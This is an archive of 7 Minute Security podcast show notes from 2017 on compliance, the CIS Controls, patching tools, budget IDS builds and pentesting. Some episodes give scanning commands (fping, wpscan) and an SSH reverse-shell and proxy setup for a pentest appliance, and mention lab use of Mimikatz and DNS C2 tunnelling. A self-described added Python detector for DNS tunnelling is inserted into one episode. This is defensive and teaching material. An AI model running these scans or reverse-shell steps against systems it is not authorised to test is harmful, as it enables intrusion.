    • Consent: the individual has given clear consent for you to process their personal data for a specific purpose.

    • Contract

    • Legal obligation

    • Vital interests

    • Public task

    • Legitimate interests

    Are there any good step-by-step guides to GDPR compliance?

    This site lays things out at a high level with a 12-step program, if you will.

    How can I learn more about GDPR?

    This http://gdprandyou.ie/ site is a great GDPR primer, and this PDF from Imperva is good as well. I also googled GDPR for dummies and found some good results too :-)


    7MS #293: How to Become a Packtpub Author - Part 2 Jan 04, 2018

    Back in episode 280 I talked about how I started working with PacktPub to start authoring a video course on vulnerability scanning using Kali.

    Since that episode I've found that recording and editing high quality video clips is taking waaaaaayyyyyyyyyyy longer than I'd like, but it's worth it to create good stuff! PacktPub authored a tool called Panopto to make videos, but I found it a little frustrating to work with, so I'm going with the following janky - but functional - recording setup:

    • Record raw video using iShowU

    • Pull that video into iMovie and cleanup all the mistakes

    • Record audio in Quicktime

    • Pull audio clips into iMovie and edit those to match up with what's happening in the video

    • Export video as 1080p

    Additionally, here are a few little tweaks that help the content creation match up with PacktPub's requirements:

    • Resolution should be 1920x1080 (full HD) - I just bought a secondary monitor for this. Specifically, an HP 22cwa.

    • I set my .bashrc file to use all white for the terminal prompt. See this article which helped me out.

    • In Terminal I created a PacktPub profile that has font as Monospace Regular 20pt.


    7MS #292: OFF-TOPIC - How I Nearly Killed My Sister with a Snowball Dec 28, 2017

    Hey folks, I had originally planned to cover the CredDefense toolkit but I couldn't get it working. I'm basically having the same issue that someone reported here. Sooooo....will have to save that for next week.

    In the meantime, this episode features a story about how I nearly knocked a retina out of my sister's face with an ice ball when I was about 8 years old. Yep, she's still mad about it, but I think 2018 is the year for forgiveness!

    Enjoy, and we'll talk to you in 2018. Blessings to you and yours!


    7MS #291: The Quest for Critical Security Controls - Part 4 Dec 21, 2017

    Did I mention I love the Critical Security Controls? I do. And here's an absolute diamond I found this week:

    This site (http://www.auditscripts.com/free-resources/critical-security-controls/) offers awesome CSC-mapping tools (and they're free!), specifically:

    • A spreadsheet with how the CSCs map to other popular frameworks like ISO and NIST

    • A manual assessment tool for measuring your org - or someone else's org - against the CSCs. Flippin' sweet right? RIGHT!

    Also, be sure to come and Slack chat with us, as my pal hackernovice is building a tool called MacMon to help you satisfy CSC #1!

    Lastly, I built an LOL-worthy pentesting recon tool called SSOTT (Scan Some of the Things) that might help you automate some NMAPing, DIRBing, NIKTOing, and the like. Cheggitout!


    7MS #290: Interview with Joe Klein Dec 14, 2017

    My pal and former coworker Joe Klein joins me in the virtual studio to discuss:

    • His career as a diesel mechanic and insurance guru
    • How to leave a stable job, take a huge pay cut and start a risky infosec internship (sounds like the name of a broadway musical!)
    • The start of his new career as a SOC analyst
    • The importance of having a career cheerleader/mentor
    • Being hungry for knowledge and certifications without being ashamed or afraid to look like a newb
    • CompTIA Security+ and Cisco CCNA Cyber Ops certs
    • The proper pronunciation of the word "dude"
    • How to do a proper Arnold Schwarzenegger impression

    Other references made in the episode:

    • Arnold Schwarzenegger the love poet

    Joe welcomes your comments, concerns, insults and questions via email (listen to today's episode for the address!) or Twitter.


    7MS #289: I'm Dipping My Toes in Windows Forensics Dec 07, 2017

    Two weird things happening in this episode:

    • I'm not in the car, and thus not endangering myself and others while podcasting and driving!

    • My once beloved lav mic made a trip through the Johnson family's washer and dryer. I don't know that she'll ever record anything again. We'll see once it fully dries out (fingers crossed).

    I spent some time this last week getting back into Windows systems forensics, which has been really fun. If you want a play-by-play guide with some fantastic, practical, hands-on advice, grab yourself a copy of the Blue Team Handbook: Incident Response Edition. I also started a forensics page on BPATTY.

    Also, I picked up a Google Home Mini for $30 and can honestly say it quickly has found a special place in my tech/geek heart...even if it is recording everything I say and sending it to the NSA. But a small device that will play Michael Buble's Christmas album as soon as I command it with my voice? Worth the privacy sacrifice.

    Finally, if you're in the St. Paul, MN area tomorrow and wanna hear me come talk about "Blue Team on a Budget," come to the Government IT Symposium - more info here.


    7MS #288: I'm BURPing a Lot Dec 01, 2017

    Sorry the podcast is late this week - but it's all for good reasons! I'm busy as a bee doing a ton of pentesting so I have a smattering of random security stuff to share with you:

    Mac High Sierra root bug

    Did you hear about this? Basically anybody could log in as user root on your system without a password because...there isn't a password! Read the Twitter thread where I originally read the news here, read about the root account madness here, and then read how the fix broke file sharing here.

    BPATTY ROCKS!

    I tried to wiki-fy my BPATTY project to make it a bit easier to read, so head to bpatty.rocks and let me know what you think!

    I'm BURPing a lot

    I can't tell you how fun it has been to get back in the pentesting saddle and hack some Web sites these past few weeks. Here are a few tips/tricks others taught me that have helped me get back in the swing of things:

    • In Burp, state files are being deprecated in favor of project files. Read more here

    • For BApp extensions, here are a few that help you get the job done:

      • retire.js looks for old/outdated/vulnerable JavaScript libraries
      • Software vulnerability scanner helps you find vulnerable software, such as old versions of IIS
      • CO2 has a bunch of tricks up its sleeve - my favorite of which is helping you craft sqlmap commands with the right flags

    More on today's show!


    7MS #287: Introducing 7 Minute Security LLC Nov 22, 2017

    Well, after over-teasing this last week, I'm excited to announce that I've started my own company! 7 Minute Security, LLC gives me an outlet to do all my favorite infosec stuff, such as:

    • Network assessments
    • Vulnerability scanning
    • Penetration testing
    • Training
    • Public speaking

    I welcome you to check out 7MinSec.com for more information. Or 7MinuteSecurity.com or SevenMinuteSecurity.com. Collect 'em all!

    What does this mean for the podcast?

    Nada - I'll keep cranking it out. Maybe we'll cover a few more business related topics (people have asked about how to get an LLC off the ground, so I might do an episode or two on that), but otherwise everything's the same!

    What about the Patreon project?

    Because I've been blessed with this opportunity - which will in turn help me keep the 7MS lights on - the Patreon campaign will close down soon. For you lovely Patreons, I've sent you a message (via Patreon site and via email) with more details.


    7MS #286: The Quest for Critical Security Controls - Part 3 Nov 16, 2017

    We're continuing to hammer on the CSCs again this week. Here's some rad resources that can get your CSC efforts in the right direction:

    • CIS Implementation Guide for SMEs

    • CIS Cybersecurity quarterly newsletters

    • Netdisco lets you locate machines by MAC or IP, show the corresponding switch port, and disable it if necessary.

    • Defensive Security Handbook isn’t specifically mapped to CSCs but offers great advice to tie into them.

    • Open-Audit tells you what’s on your network, how it’s configured, and when it changes.


    7MS #285: The Quest for Critical Security Controls - Part 2 Nov 09, 2017

    Nothing to do with security, but I've heard this song way too much this week.

    I love the CIS Controls but it seems like there isn't a real good hands-on implementation guide out there. Hrmm...maybe it's time to create one? Speaking of that, check out the MacMon project and chat with us about it via Slack.

    After hearing rave reviews about Fingbox (not a sponsor), I picked one up (~$120) and wow, I'm impressed! It's got a lot of neat features that home users and SMBs would like as it relates to mapping to CSC #1:

    • Ability to map network devices to users to create an inventory
    • Email alerts for new devices that pop up on the network
    • Block unwanted users from the app, even when not directly connected to the LAN
    • Nice set of troubleshooting tools, such as wifi throughput test, Internet speed test, and port scanning of LAN/WAN devices

    More on today's show...


    7MS #284: The Quest for Critical Security Controls Nov 02, 2017

    For a long time I've been electronically in love with the Critical Security Controls. Not familiar with 'em? The CIS site describes them as:

    The CIS Controls are a prioritized set of actions that protect your critical systems and data from the most pervasive cyber attacks. They embody the critical first steps in securing the integrity, mission, and reputation of your organization.

    Cool, right? Yeah. And here are the top (first) 5 that many organizations start to tackle:

    1. Inventory of Authorized and Unauthorized Devices
    2. Inventory of Authorized and Unauthorized Software
    3. Secure Configurations for Hardware and Software
    4. Continuous Vulnerability Assessment and Remediation
    5. Controlled Use of Administrative Privileges

    Google searches will show you that you can definitely buy expensive hardware/software to help you map to the CSCs, but I'm passionate about helping small businesses (and even home networks!) be more secure, so I'm on a quest to find implementable (if that's a word?) ways to put these controls in place.

    I'm focusing on control #1 to start, and I've heard great things about using Fingbox (not a sponsor) to get the job done, but I'm also exploring other free options, such as nmap + some scripting magic.

    More on today's episode...


    7MS #283: OFF-TOPIC - I Love Cops and COPS Oct 27, 2017

    My plans for this week's podcast went hush-hush, kablooie, bye-bye, see ya, adios.

    So, I'm pinch-hitting and going off-topic and talking about...of all things...cops. Now wait! Wait wait! Don't run away. I'm not going all political on you or anything like that. Just wanna share some anecdotes and perspectives on the following:

    • What it was like growing up with a dad who was a cop

    • Losing a cousin in the line of duty

    • Getting a call from my local police department this week claiming I was a danger to a school bus full of kids. Whaaaaa?

    • Oh, and I sing a little bit on this episode too.


    7MS #282: A Peek into the 7MS Mail Bag Oct 19, 2017

    I'm gonna level with you: it's been a heck of a week. So I thought I'd try something a little different (and desperate?) and use this episode to answer some FAQs that come in via email and Twitter DM. Today's burning questions include:

    Q: Do I think it's dangerous to podcast and drive?

    A: Not really, especially now that I got one of these babies.

    Q: What is the eJPT cert all about?

    A: It looks like a pentest training/cert path that sits somewhere (difficulty wise) between CEH and OSCP. It's favorably reviewed and will set you back a few hundred dollars.

    Have you taken this cert? I'd love your feedback and, if possible, to do a mini Skype interview with you for the show. Drop me a note and let's chat.

    Q: What's a good place to practice Web hacking skills online?

    A: I've been a long time fan of Juice Shop, and up next in my queue is HackTheBox.

    Q: Any more Vulnhub.com VMs in the works?

    A: Kinda. Listen to today's episode :-)


    7MS #281: Baby's First Banking Infosec Conference Oct 11, 2017

    I went to my first ever banking-focused infosec conference a few weeks ago (WBA's Secure-IT) and learned a ton.

    I met some really great people and had many productive conversations around security. The main takeaways from the conference that I talk about in today's episode:

    • Standing all day and talking about security is exhausting!

    • You can thwart "swag whores" (sorry mom, but I learned that that's what they're called!) by pushing your merch table deep into the booth so it's touching the rear curtain. That way people have to go through your "people perimeter" and engage in conversation with you in order to be granted access to the swag!

    • From the conversations I had with the staff at these small banks, they're definitely wanting to slurp up as much helpful info from the sessions as possible. Specifically, finding ways to better improve security posture using free/cheap tools is ideal!

    • I attended a few sessions that got my blood boiling. The outline of these talks went something like this (slight exaggeration added, but not much):

      • Hackers are way smarter and more physically attractive than you, and they can get by all your defenses with ease
      • You're helpless, hopeless, and not physically attractive
      • Luckily we (Vendor X) are here and we offer our patented Super Solution Y that will thwart the APTs 100% of the time, no question, guaranteed
    • People don't appreciate being talked down to, nor do they want to be shamed, blamed or scared into making security better.

    More on today's episode...


    7MS #280: How to Become a Packtpub Author Oct 05, 2017

    I'm excited to announce I'm going to be a PacktPub author! I'm going to work with them to create a course on network/vulnerability scanning. I'm pumped, but kinda nervous, so when I had the initial conversations with PacktPub staff, I made sure I hit them with my burning questions:

    Q: Are you going to ask me to create a sweet course and then pay me pennies for every digital copy sold?

    A: No. Authors get paid a lump sum up front and then share in profits for digital copies sold.

    Q: Who's gonna dictate the project outline - as well as timeline for recording it?

    A: It's a joint effort. The author dreams up the timeline, fine-tunes it with PacktPub, and then hammers out a mutually agreeable project timeline.

    Q: Do I have to buy some expensive software/hardware to make these videos?

    A: Not really. PacktPub did recommend I buy a better microphone (so I got a Snowball), and then they license authors a copy of Panopto to record the videos.

    More Qs and As covered on today's episode!


    7MS #279: Patching Solutions Bake-Off - Part 4 Sep 28, 2017

    Intro

    The patching solutions review concludes this week with Ivanti's patch solution, as well as PDQ Deploy/Inventory.

    As a quick reminder, here's where our bake-off currently sits:

    • Ninite (covered in 7MS #275)
    • ManageEngine (covered in 7MS #277)

    Quick reminder: none of these solutions are bribing me with fat wads of cash to plug their products. Some day I hope to have such problems, but today is not that day.

    Ivanti

    You might know Ivanti as Shavlik - that's the product name I'm more familiar with anyways. Back in February, Shavlik became Ivanti.

    Pros
    • Pretty easy to install and manage - even without a deep background in IT (in today's episode I tell a story that can back this claim based on my experience)

    • Does a solid job of patching the Windows OS and third-party software

    Cons
    • Pricing is a little steep - last figures I saw were ~$80 per server, per year and ~$40 per workstation, per year.

    • ITScripts library (that allows for GPO-style policy enforcement) is a little slim when compared to similar functionality offered from other solutions

    PDQ Deploy/Inventory

    Pros
    • Lets you go crazy with building custom packages you can deploy to granular groups

    • Awesome online help resources, including a YouTube video library that's got a video for just about everything

    • Quick response to support tickets

    Cons
    • A bit more complicated to get comfortable with than the other solutions

    • A little confusing on the Windows patching side - not quite as "point and patch" as some of the other solutions

    • Agentless system - machines have to be able to "see" the PDQ


    7MS #278: Interview with Rob Sell Sep 21, 2017

    Intro

    We're breaking ground with this episode, folks! For the first time in 7MS history, we've got a guest on the show (finally, right?!).

    Rob Sell is an IT manager who has been working in IT for many years, with a focus on information security specifically for the last 4 years. He recently came home from Defcon 25 with a third place in the SE CTF.

    Rob sat down with me to discuss the CTF, how to make an outstanding CTF audition video, OSINT tools/tips/techniques, the value of tech/security certifications, career advice, and more!

    Interview notes and links
    • Here's Rob's Defcon CTF audition video

    • EchoSec helps you see a geographical area at a certain point in time. According to the Web site, EchoSec is "the most comprehensive social sentiment tool on the market" - hmmmm, seems like a great SE tool!

    • X-Ray is "a tool for recon, mapping and OSINT gathering from public networks."

    • Michael Bazzell's Web site has online training, free tools and other goodies. Michael also has some books.

    • Christopher Hadnagy has a podcast that's strictly focused on SE. He's also got some books.

    • ArcGIS isn't necessarily labeled as an SE tool, but can certainly be used for SE efforts.


    7MS #277: Patching Solutions Bake-Off - Part 3 Sep 14, 2017

    ManageEngine Desktop Central

    Overall, I have to bluntly say that I really enjoyed playing with ManageEngine's solution. It's got a crap-ton of features built into it - above and beyond patching - that I think IT/security folks will really appreciate.

    Pros
    • Agent or agentless management of systems

    • MDM (didn't play with it but it certainly looks feature-rich)

    • Application white/blacklisting

    • Ability to push out configurations for things you'd normally use GPOs for - i.e. setting a login banner, enforcing screen locks, setting IE homepage and search engine, etc.

    • Patch management is full-featured - it's easy to setup a simple "scan systems, download and deploy missing patches." Or just a "scan to identify missing patches" kind of thing. It's easy to run a variety of reports to find out which systems are most vulnerable, which patches are missing across the enterprise, etc.

    • Software deployment engine - there's a big package library where you can easily search and deploy things like Dropbox, Adobe Reader, etc. It also includes a self-service portal where users can simply select certain packages and have them installed automagically!

    • Inventory - ability to have detailed hardware/software level details on each machine. Ability to block software by path and/or hash. You can also give people a warning saying "We're gonna nuke dropbox in 2 days if you keep it on here!"

    • Agent-based install gives you ability to chat with users, remote control systems, send announcements, drop to a command line at a target machine, etc.

    • Reports - you can create a report for just about anything under the sun like AD group changes, user logon reports, users that are disabled/expired, and on and on...

    • Email alerts - I think you can trigger an email alert for just about ANYTHING that happens in the environment.

    ...more on today's episode!


    7MS #276: The CryptoLocker song Sep 06, 2017

    This is it! The worldwide Internet debut of an original infosec-themed song called CryptoLocker'd, and as the name implies, it's about a CryptoLocker incident. Here's the quick back story:

    A few years ago I worked on an incident response where a user got phished with a promise of a free burrito from Chipotle but instead got a free order of CryptoLocker! And rather than tell IT or sound the alarms, the user just left for the day! The next day they came back and the company was digitally on fire, and they played ignorant to what was going on.

    I found the user's handling of the situation humorous (read: not the CryptoLocker infection itself!), so I was inspired to write a song about it. Today's episode has the audio, and I welcome you to follow along with the lyrics below (head to 7ms.us to see the full lyrics as they are included in a GitHub gist)


    7MS #275: Patching Solutions Bake-Off - Part 2 Aug 30, 2017

    This episode continues our series on comparing popular patching solutions, such as:

    • Ninite
    • ManageEngine
    • Ivanti
    • PDQ

    Ninite

    This week I focused on Ninite, and here's the TLDR version:

    Pros
    • Does one thing (third party patching) and does it really well

    • Extremely affordable

    • User interface is clean, simple and really easy to use/learn

    Cons
    • No "agentless" option - it's an agent or nothin'

    • I'm not sure if Ninite has the brand name recognition and reputation to be accepted/respected by large companies

    • I need to do more homework on how they pull down their packages...are they ripping apart packages and repackaging them at all? That could be a big avenue for side-loading icky stuff.


    7MS #274: Speaking at ILTACON - Part 4 Aug 23, 2017

    I'm back from Vegas! My talk went really well and I'm excited to tell you about it in today's episode. First, some conference/trip highlights:

    During the ILTACON conference I attended a great talk by Don McMillan about how to infuse humor into your work environment. Really enlightening, and you know those things you hear about how humor lowers blood pressure, increases satisfaction and just overall makes you a more pleasant person to be around? Turns out it's true!

    On the day before my presentation I got my first experience touring around the Vegas strip, and the people watching did not disappoint. I also saw the Muhammad Ali and Van Gogh exhibits, which were awesome.

    When it came to the actual talk, everything went really well. The audio/visual stuff all worked perfect, and I felt the content delivery went over well too. People asked a lot of questions and even hung out afterwards to discuss security topics further.

    There were two big surprises I wasn't expecting, though:

    1. A podcast listener was at the conference, and shared with me that after listening to lots of 7MS episodes, he always figured I looked like Jared from Subway. :-(

    2. Super talented artists from a company called Filament did a comic-book style retelling of my talk live as I was doing it. I love crazy-talented people like this, so I was totally geeking out. I reposted the renderings (with their permission) at my personal portfolio site if you wanna check 'em out.


    7MS #273: Speaking at ILTACON - Part 3 Aug 17, 2017

    I ran out of time in episode #272 to tell you about why preparing to be a speaker for ILTACON was way more stressful than preparing for Secure360 a few months ago. The main points of difference/stress were:

    • ILTA wanted to see PowerPoint deck progress weekly, whereas with Secure360 it was pretty much "Your talk is accepted - see you at the conference!"

    • ILTA is going to show a "speaker slide" with bio a few minutes before the session starts. That way the session is focused on content (and probably avoids people who like to talk about themselves too much :-)

    • ILTA requested my PowerPoint and handouts a few weeks before the session so they could put them on their Web site for attendees to see. Although that put some pressure on me to get content done early, I think it's great because presumably some people at the talk will have screened the content and therefore be more tuned in.


    7MS #272: Speaking at ILTACON - Part 2 Aug 17, 2017

    This is part 2 of a series focusing on public speaking - specifically for the ILTACON conference happening in Vegas this week.

    In this episode I share a high-level walkthrough of my talk and the 10 "Blue Team on a Budget" tips that the talk will focus on. These tips include:

    • Turning up Windows auditing and PowerShell logging
    • Installing Sysmon
    • Installing Security Onion
    • Don't put too much faith in endpoint protection
    • Keep an eye on Active Directory
    • Install RITA
    • Deploy a Canary
    • Use strong passwords
    • Install LAPS
    • Scan and patch all your things

    7MS #271: Patching Solutions Bake-Off - Part 1 Aug 10, 2017

    Seems like every business I meet with needs some sort of help in the patching department. Maybe they've got the Microsoft OS side of the house under control, but the third-party stuff is lacking. Or vice-versa. Either way, the team I work with is excited to kick the tires of some popular patching solutions over the next few weeks, and we'll audibly barf up what we learn into this mini-series!

    Solutions we'll poke around with include:

    • Ninite
    • ManageEngine
    • PDQ Deploy

    PS: None of these solutions are sponsoring 7MS. They're just popular patching solutions we're trying out to learn more about 'em and give you the pros/cons we discover!

    In today's episode I dive a bit into...

    Ninite Pros
    • Cheap
    • Does one thing, and does it well
    • Been around for a long time
    • Cloud-based - doesn't rely on LAN-side server
    Cons
    • Only cloud-based...no LAN-side option
    • Requires an agent
    • Agent's only purpose is patching - no extra bells/whistles like remote control or inventorying capability

    7MS #270: IDS on a Budget - Part 4 Aug 03, 2017

    I spent a bunch of time with Security Onion the last couple of weeks and have been lovin' it! I ran the install, took all the defaults, ran the updates, and pretty much just let it burn in on my prod (home) environment.

    After a few days, I went back to check the Security Onion dashboard to check the alerts. There was a bunch of benign stuff (computers pinging each other, Dropbox broadcasting to the network) but also a couple interesting finds - SO caught one of my VMs downloading (intentionally) Invoke-Mimikatz. The dashboard allows you to see transcripts of file downloads like this, as well as a tool called Network Miner to extract a copy of the downloaded file for further analysis.

    One thing the SO didn't pick up on was the DNS-based C2 tunnel I setup on a test victim client. However, it turns out RITA works great for exactly this type of analysis - it reported the huge number of DNS requests from my victim client to the C2 server. Very helpful info for an incident response situation!


    7MS #269: Documentation Jul 27, 2017

    Documentation is super boring, right? Yet it's critical to getting your client/audience excited about making their security better!

    In this episode I talk about my mixed feelings towards the "big" standards like ISO/NIST/etc. and how a more tactical, down-to-earth documentation approach might be more effective in some cases. And I think we need our documentation to be much more focused on consultation/remediation and not just "Hey, your security sucks...and these next 100+ pages will tell you exactly why!" We can do better!

    Yes, this episode is like 18 minutes because, well, I guess I'm really passionate about documentation. :-)


    7MS #268: IDS on a Budget - Part 3 Jul 19, 2017

    Been having a blast working with the beta branch of the Sweet Security project and I'm anxious to try the latest fixes of the beta branch. Give it a look!

    I also spent a lot of time the last few nights playing with Security Onion and love it. After zipping through the install wizard and hitting reboot a few times you're pretty much good to go. A few recommendations I'd make after those initial reboots though:

    • Run the soup command to update Security Onion with all the latest packages

    • Use ufw to adjust the internal firewall to allow management from ports other than SSH (which is already preconfigured)

    • On a side note, I think you might have to have your vnic in VMWare set to promiscuous mode in order to allow proper network sniffing.

    • Do a wget http://testmyids.com to ensure Security Onion alerts are pouring into the Sguil dashboard.

    Also, check out this article for some handy tips on threat hunting with Bro.

    Next up on my "test this out list" is to set up DNS tunneling to a Digital Ocean droplet I set up, and see if the onion picks up on that, or if I can at least get warned somehow about a high amount of DNS traffic.
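    The "huge number of DNS requests from one client" finding that RITA reported in 7MS #270, and the "get warned about a high amount of DNS traffic" question above, can be approximated with a short script over Bro-style dns.log records. This is an added example, not code from 7MS, RITA or Security Onion; the log lines are constructed, simplified Bro-style records (tab separated, with a #fields header naming a subset of the real columns), and the thresholds are assumptions chosen for the sample.

```python
"""Flag clients whose DNS behaviour looks like tunnelling: many queries and
many unique names under a single parent domain, often with long leftmost
labels because encoded data is being carried in the hostname.

Added example, not part of 7MS, RITA or Security Onion. Log format and
thresholds are assumptions; the records below are constructed.
"""
from collections import defaultdict

# Constructed sample: 10.0.5.20 is an ordinary workstation, 10.0.5.77 is a
# "victim" client sending 120 TXT lookups for unique, long subdomains of
# one parent domain (the shape a DNS-based C2 channel produces).
SAMPLE_DNS_LOG = (
    "#fields\tts\tid.orig_h\tid.resp_h\tquery\tqtype_name\n"
    "1501000000.1\t10.0.5.20\t10.0.5.1\twww.example.com\tA\n"
    "1501000001.2\t10.0.5.20\t10.0.5.1\tupdate.example.net\tA\n"
    "1501000002.3\t10.0.5.20\t10.0.5.1\twww.example.com\tAAAA\n"
    + "".join(
        f"15010001{i:02d}.0\t10.0.5.77\t10.0.5.1\t"
        f"{'a' * 20}{i:04x}.c2.example.org\tTXT\n"
        for i in range(120)
    )
)


def parse_dns_log(text):
    """Yield one dict per data row of a Bro-style log with a #fields header."""
    fields = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
            continue
        if line.startswith("#"):
            continue  # other Bro metadata lines (#separator, #types, ...)
        if fields is None:
            raise ValueError("data row encountered before #fields header")
        yield dict(zip(fields, line.split("\t")))


def parent_domain(query, labels=2):
    """Collapse a query name to its last `labels` labels (assumption: no
    public-suffix list, so 'example.co.uk' style names need labels=3)."""
    parts = query.rstrip(".").lower().split(".")
    return ".".join(parts[-labels:])


def dns_tunnel_candidates(records, min_queries=100, min_unique_names=50):
    """Group by (client, parent domain) and return the groups that exceed
    both thresholds, sorted by query volume. Average leftmost-label length
    is reported as supporting evidence, not used as a threshold."""
    stats = defaultdict(lambda: {"queries": 0, "names": set(), "label_len": 0})
    for r in records:
        key = (r["id.orig_h"], parent_domain(r["query"]))
        s = stats[key]
        s["queries"] += 1
        s["names"].add(r["query"].lower())
        s["label_len"] += len(r["query"].split(".")[0])

    findings = []
    for (client, domain), s in stats.items():
        if s["queries"] >= min_queries and len(s["names"]) >= min_unique_names:
            findings.append({
                "client": client,
                "domain": domain,
                "queries": s["queries"],
                "unique_names": len(s["names"]),
                "avg_first_label_len": s["label_len"] / s["queries"],
            })
    return sorted(findings, key=lambda f: -f["queries"])


if __name__ == "__main__":
    for f in dns_tunnel_candidates(parse_dns_log(SAMPLE_DNS_LOG)):
        print(f"{f['client']} -> {f['domain']}: {f['queries']} queries, "
              f"{f['unique_names']} unique names, "
              f"avg first label {f['avg_first_label_len']:.1f} chars")
```

Against a real dns.log the thresholds need tuning per environment (CDNs and anti-spam lookups also produce many unique names), so treat a hit as a lead for the kind of follow-up described above rather than a verdict.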


    7MS #267: Backup Disasters Jul 18, 2017

    Today's episode is a horror story about how I recently lost 5+ years of CrashPlan backups due to what I'm calling a...small clerical error.

    Yes, this oopsie was 100% my fault, but I think backup providers can do a better job of warning us (via text or automated call rather than just email) before blowing away our life's work.


    7MS #266: IDS on a Budget - Part 2 Jul 13, 2017

    This week I've continued to play with the awesome Sweet Security IDS solution you can throw on a Raspberry Pi 3. A big update to share is that there is a beta branch which has some cool new features, such as the ability to break the Bro + ELK stack across multiple machines.

    I also lost a lot of sleep these last few days playing with Security Onion and will do a future episode focusing only on that!


    7MS #265: IDS on a Budget - Part 1 Jul 05, 2017

    I've been wanting to get a Bro IDS installed for a long time now - and for several reasons:

    1. It looks fun!

    2. My customers have expressed interest

    3. It will be part of my upcoming ILTACON session.

    So this weekend I started getting the hardware portion ready, which includes:

    • Ubiquiti Edge Router X (~$99)

    • TP-Link TL-SG105E (~$35)

    • CanaKit Raspberry Pi 3 Complete Starter Kit (~$70)

    If you need additional information such as screenshots/configs etc to get the VLANs passing properly from the Edge Router X to TP-LINK switch, let me know. Otherwise for now I'm just focusing on crafting content for part 2, where we'll dive into actually turning the Pi into a Bro sensor using Sweet Security.


    7MS #264: Hacking Wordpress Jun 29, 2017

    I was pleasantly surprised to see a Wordpress site fall into a pentest scope this past week. One helpful tool to get familiar with when attacking Wordpress sites is wpscan, which is built right into Kali - or you can grab it from GitHub. Get familiar with the command line flags as they can help you conduct a more gentle scan that recovers from site errors/disconnections more easily. Specifically, read up on these options:

    • --throttle - for example, I've been using --throttle 1000 in order to be a bit less intense on my target site

    • --request-timeout and --connect-timeout help your scan recover smoothly from site errors/timeouts

    Also, if you find yourself in a situation where you're testing a production Wordpress site (not recommended), consider setting up a free up/downtime alert via a service like Uptime Robot so you can get emails if the site ever poops out. That certainly beats hitting F5 in Firefox every 10 seconds :-)


    7MS #263: Make Nessus Reporting Fun Again! Jun 25, 2017

    Tell me I can't be the only one who regularly wants to combine a bunch of small Nessus scans files into a big fat Nessus scan file, and then make pretty pictures/graphs/summaries that the customer can easily understand?

    Over the last few weeks I must've tried every Powershell and Python script I could get my hands on, yet still didn't find the magic bullet solution. That is, until I found this little beauty of a tool: NamicSoft. It's a $65 tool for Windows that will not only combine multiple Nessus files into one huge file, but it offers a ton of export/reporting features to make the Nessus data more valuable. Oh, and it can also digest Burp and Nexpose data as well!

    More on today's episode...


    7MS #262: Speaking at ILTACON Jun 14, 2017

    Through kind of a weird series of events, I have an opportunity to speak at ILTACON this summer in Vegas (baby!). I'll be talking about some things you can do if you suspect your perimeter is breached, as well as low-hanging fruit you can implement to better defend against breaches. I'm pumped. And I've done the most important part and chosen a PowerPoint theme: A Few Good Men :-)

    I've spoken with some of you in the past and know a few of you spend your days and sleepless nights hunting threats. If so I'd love to talk to you to get some creative ideas as it relates to crafting the session content.


    7MS #261: Blind Network Security Assessments Jun 07, 2017

    This week I had the fun opportunity to do a "blind" network security assessment - where basically we had to step into a network we'd never seen before and make some security posture recommendations. I've found that the following software/hardware is quite helpful for this type of assessment:

    • The PwnPulse helps a ton in scanning wired and wireless networks...and even Bluetooth! I've covered the Pulse in past episodes - check out part 1 and part 2.

    • Network Detective will do a ton of helpful Active Directory enumeration and point out potential red flags, such as:

      • Accounts that haven't been logged into for a long time
      • Accounts with passwords that haven't been refreshed in a long time
      • Privileged groups that need review (Domain Admins, Enterprise Admins, etc.)
      • AD policy issues (warning: by default Network Detective only pulls back a few policies; check out scripts such as my Environment Check to grab a dump of all GPOs)

    • Thycotic Privileged Account Discovery is a free tool that can crawl AD workstations and enumerate the local administrator accounts on each machine. It makes a good case for implementing LAPS.


    7MS #260: PwnPro 101 - Part 2 Jun 02, 2017

    I'm continuing to love our PwnPro and had a chance to use it on a customer assessment this week. For the most part the setup/install was a breeze. Just had a few hiccups that the Pwnie support team straightened me out on right away.

    In the episode I mention some command line tools and syntax that helped me work with the Pulse. One was using fping to sweep large subnets and accurately find live hosts:

    fping -a -g 10.0.5.0/16 > blah.txt

    Then, to set up the reverse shell, I just forwarded port 22 from my Ubiquiti gear to my internal Kali host, and then ran this to make the reverse connection:

    ssh pwnie@localhost -p 3333

    Lastly, to set up the reverse shell so you can proxy Web traffic to an alternate host/port, such as the Nessus port, set up your shell like so:

    ssh pwnie@localhost -p 3333 -ND 8080

    Then leave that window open and set up your Web browser so that you do a SOCKS5 proxy to localhost:8080. Finally, visit http://ip.of.your.host:XXXX. So if your Pulse was 1.2.3.4 and had Nessus running, you'd visit https://1.2.3.4:8834.

    Enjoy!


    7MS #259: OFF-TOPIC - Home Robbery Attribution May 25, 2017

    Warning! Warning! This is an off-topic episode!

    I try really hard to create valuable weekly content about IT/security. However, sometimes a virtual grenade goes off in my life and prevents me from having the necessary time/resources to get my act together. This has been one of those weeks. :-)

    So today I'm going off-topic and talking about an alleged burglary of some electronics at my home. And once we identified the culprit, wow...nobody was more surprised than me.


    7MS #258: Speaking at Secure360 - Part 2 May 18, 2017

    Intro

    I mentioned last week that I was speaking at the Secure360 conference here in the Twin Cities, and at that time I was preparing a talk called Pentesting 101: No Hoodie Required. I was so nervous that I've basically spent the last week breathing heavily into paper bags and wishing I was on sedatives.

    But I have good news to report in today's episode, friends! The talk was very well received and the attendees didn't get out torches and pitchforks! #winning! So today's episode (audio below) talks more about the public speaking experiences and highlights some lessons learned:

    Things I'd do again next time
    • I'd not tempt the demo gods and still pre-record my hacking movies ahead of time. I saw some people do live demos of very technical things and it did not go well for a few of them :-(

    • I would still spend way too many hours cutting together my movies in iMovie so that they followed a good tempo when presented live

    • I would still have a copy of my presentation on two different laptops, 3 USB thumb drives, a cloud copy, and a copy sent to the Secure 360 folks just in case. Backups, backups, backups - am I right?

    What I'd do differently next time
    • I'd hopefully have the preso done a few days (weeks, even!) ahead of time and practice it in front of colleagues to get some feedback.

    • I'd still have a theme to the presentation, but rather than something specific like Terminator 2, maybe I'd go even more general and pick a movie/character that could appeal even more to the masses.

    • I wouldn't worry so much about having a presentation that "nails it" for everybody. That's just not possible! We're all coming from different backgrounds and skillsets. It's not gonna be a home run for everybody.


    7MS #257: Speaking at Secure360 May 11, 2017

    The nervous butterflies are chewing up my organs this week. Why? Because I'm speaking at Secure360 next Tuesday and Wednesday.

    I'm trying to build a presentation that:

    • Appeals to both techie nerds like me, as well as regular human people

    • Strikes a healthy balance between fun and informative

    So, my outline is roughly as follows:

    • Intros
    • Let's talk about pentesting vs. vulnerability scans
